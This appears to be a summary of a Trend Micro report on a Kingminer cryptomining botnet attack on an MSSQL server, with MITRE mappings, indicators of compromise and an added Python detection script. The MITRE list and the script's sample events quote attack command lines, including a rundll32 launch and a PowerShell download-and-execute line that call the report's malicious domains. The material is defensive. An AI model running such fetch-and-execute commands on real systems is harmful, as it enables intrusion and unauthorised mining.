Trend Micro’s Managed XDR investigated a Kingminer botnet attack that targeted an MSSQL server by abusing obfuscated PowerShell and VBScript, leading to a fileless miner deployment. The findings trace the attack chain from initial exploitation through payload downloads and memory-only execution, including BlueKeep (CVE-2019-0708) checks, and emphasize patching exposed servers and enhancing network monitoring. #Kingminer #BlueKeep #CVE-2019-0708 #PowerShell #VBScript #TrendMicroVisionOne
Keypoints
- Kingminer botnet activity targeted SQL servers for cryptocurrency mining, with prior reports dating from 2018–2020 and a noted resurgence in mid-2020.
- A Microsoft SQL server process created an obfuscated PowerShell command, indicating remote code execution via a compromised MSSQL instance.
- A VBScript file named %PUBLIC%\gfghhjhyuq.vbs was executed through sqlservr.exe, pointing to multiple script-based infection stages.
- The malware chain downloads a 32‑bit or 64‑bit PowerShell binary from a GitHub repository and saves it as sysdo.exe for execution.
- Subsequent fileless activity uses Invoke-Expression to run additional PowerShell scripts downloaded from generated URLs, enabling memory-based execution.
- The attackers leverage rundll32 (via main.cpl) to launch payloads in memory and reach a known malicious domain to retrieve further components.
- BlueKeep (CVE-2019-0708) vulnerability checks are performed by assessing the Windows version and the presence of the relevant hotfixes; if the system is unpatched, RDP access is disabled so the compromise can continue.
MITRE Techniques
- [T1046] Network Service Scanning – The investigating team used Shodan and Censys to see exposed services such as RDP and SQL and to validate missing patches on any machine. ‘Using a search engine for internet of things (IoT) devices like Shodan and Censys, the team was able to both see exposed services such as RDP and SQL and validate missing patches on any machine.’
- [T1059.001] PowerShell – A Microsoft SQL server process created an obfuscated PowerShell command. ‘a Microsoft SQL server process created an obfuscated PowerShell command.’
- [T1059.005] VBScript – A VBScript file named %PUBLIC%\gfghhjhyuq.vbs executed through sqlservr.exe. ‘A VBScript file named %PUBLIC%\gfghhjhyuq.vbs executed through sqlservr.exe.’
- [T1105] Ingress Tool Transfer – The malware downloads a standalone PowerShell binary from a raw file stored in a GitHub user’s repository. ‘downloads a standalone PowerShell binary from a raw file stored in a GitHub user’s repository.’
- [T1218.011] Rundll32 – rundll32 is used to launch payloads in memory via main.cpl. ‘"C:\Windows\System32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\main.cpl" -QmDvMERT99 http://qqqe.1eaba4fdae.com/ -ming day2 -PRHVoCqZ99I*X)’
- [T1210] Exploitation of Remote Services – BlueKeep vulnerability checks (CVE-2019-0708) are performed; if unpatched, the system is vulnerable and the attacker proceeds. ‘If it finds that none of the hotfixes is present, this means that it is vulnerable to the BlueKeep vulnerability assigned as CVE-2019-0708.’
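The process-creation behaviours listed above (an MSSQL process spawning PowerShell or a script host, a VBScript run from %PUBLIC%, Invoke-Expression of downloaded content, and rundll32 launching a .cpl with a URL argument) translate directly into detection logic. The following is an added example, not Trend Micro code or part of the original report: it scans constructed process-creation records modelled on Sysmon Event ID 1 fields and tags each match with the corresponding technique. The sample command lines, the base64 string and the event structure are constructed for illustration; the two domains come from the report’s IoC list.

```python
"""Detection logic for the Kingminer process chain described in the report.

Added example (not Trend Micro's code). Events are constructed to mimic
Sysmon Event ID 1 (parent image, child image, command line).
"""
import re
from dataclasses import dataclass

# Domains from the report's IoC list; everything else below is constructed.
KNOWN_DOMAINS = {"ww.3113cfdae.com", "qqqe.1eaba4fdae.com"}

SHELLS_AND_SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe",
                           "cscript.exe", "wscript.exe"}

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENCODED_PS = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")
IEX = re.compile(r"(?i)\b(?:iex|invoke-expression)\b")
URL_HOST = re.compile(r"(?i)https?://([A-Za-z0-9.-]+)")
# rundll32 Shell32.dll,Control_RunDLL "<something>.cpl"
CPL_RUNDLL = re.compile(r'(?i)shell32\.dll,control_rundll\s+"?[^"\s]+\.cpl"?')
# a .vbs under %PUBLIC% (or its expanded form)
PUBLIC_VBS = re.compile(r'(?i)(?:%public%|\\users\\public)\\[^\\\s"]+\.vbs')


@dataclass
class ProcEvent:
    parent: str   # full path of the parent image
    image: str    # full path of the created process
    cmdline: str  # command line of the created process


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list:
    """Return the list of technique tags an event matches (empty if benign)."""
    hits = []
    parent, child = basename(ev.parent), basename(ev.image)
    if parent == "sqlservr.exe" and child in SHELLS_AND_SCRIPT_HOSTS:
        hits.append("T1059: MSSQL process spawned a shell or script host")
    if child in {"powershell.exe", "pwsh.exe"} and ENCODED_PS.search(ev.cmdline):
        hits.append("T1059.001: encoded PowerShell command")
    if IEX.search(ev.cmdline) and URL_HOST.search(ev.cmdline):
        hits.append("T1059.001: Invoke-Expression of downloaded content")
    if PUBLIC_VBS.search(ev.cmdline):
        hits.append("T1059.005: VBScript executed from %PUBLIC%")
    if child == "rundll32.exe" and CPL_RUNDLL.search(ev.cmdline) and URL_HOST.search(ev.cmdline):
        hits.append("T1218.011: rundll32 Control_RunDLL .cpl with URL argument")
    for host in URL_HOST.findall(ev.cmdline):
        if host.lower() in KNOWN_DOMAINS:
            hits.append(f"IoC: known Kingminer domain {host.lower()}")
    return hits


def scan(events: list) -> dict:
    """Map event index -> technique tags for every event that matched."""
    findings = {}
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            findings[i] = hits
    return findings


SQL = r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe"
# Constructed sample events; the base64 blob is a placeholder, not real content.
SAMPLE_EVENTS = [
    ProcEvent(SQL, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -EncodedCommand QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA"),
    ProcEvent(SQL, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "%PUBLIC%\gfghhjhyuq.vbs"'),
    # renamed PowerShell binary (sysdo.exe, per the report) pulling a script into memory
    ProcEvent(r"C:\Windows\Temp\sysdo.exe", r"C:\Windows\Temp\sysdo.exe",
              "sysdo.exe -c \"IEX (New-Object Net.WebClient).DownloadString('http://ww.3113cfdae.com/eb.txt')\""),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\rundll32.exe",
              r'"C:\Windows\System32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\main.cpl" -QmDvMERT99 http://qqqe.1eaba4fdae.com/ -ming day2'),
    # benign: a user opening the Date and Time control panel applet
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
              r'rundll32.exe Shell32.dll,Control_RunDLL "C:\Windows\System32\timedate.cpl"'),
]

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS).items():
        print(f"event {i}: {SAMPLE_EVENTS[i].image}")
        for h in hits:
            print("  -", h)
```

The rundll32 rule deliberately requires both the Control_RunDLL .cpl form and a URL in the arguments, so the ordinary control-panel launch in the last sample event produces no finding; tightening on the parent process (sqlservr.exe, a renamed PowerShell) or on a .cpl outside the usual set would raise fidelity further on real telemetry.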
Indicators of Compromise
- [SHA256] context – 0CF6882D750EEA945A9B239DFEAC39F65EFD91B3D0811159707F1CEC6CD80CC0, CB29887A45AEA646D08FA16B67A24848D8811A5F2A18426C77BEAAE9A0B14B86
- [URL] context – http://ww.3113cfdae.com/eb.txt, http://qqqe.1eaba4fdae.com/
- [Domain] context – ww.3113cfdae.com, qqqe.1eaba4fdae.com
- [File] context – gfghhjhyuq.vbs, sysdo.exe
- [File path] context – C:\Windows\Temp\sysdo.exe, C:\Windows\system32\main.cpl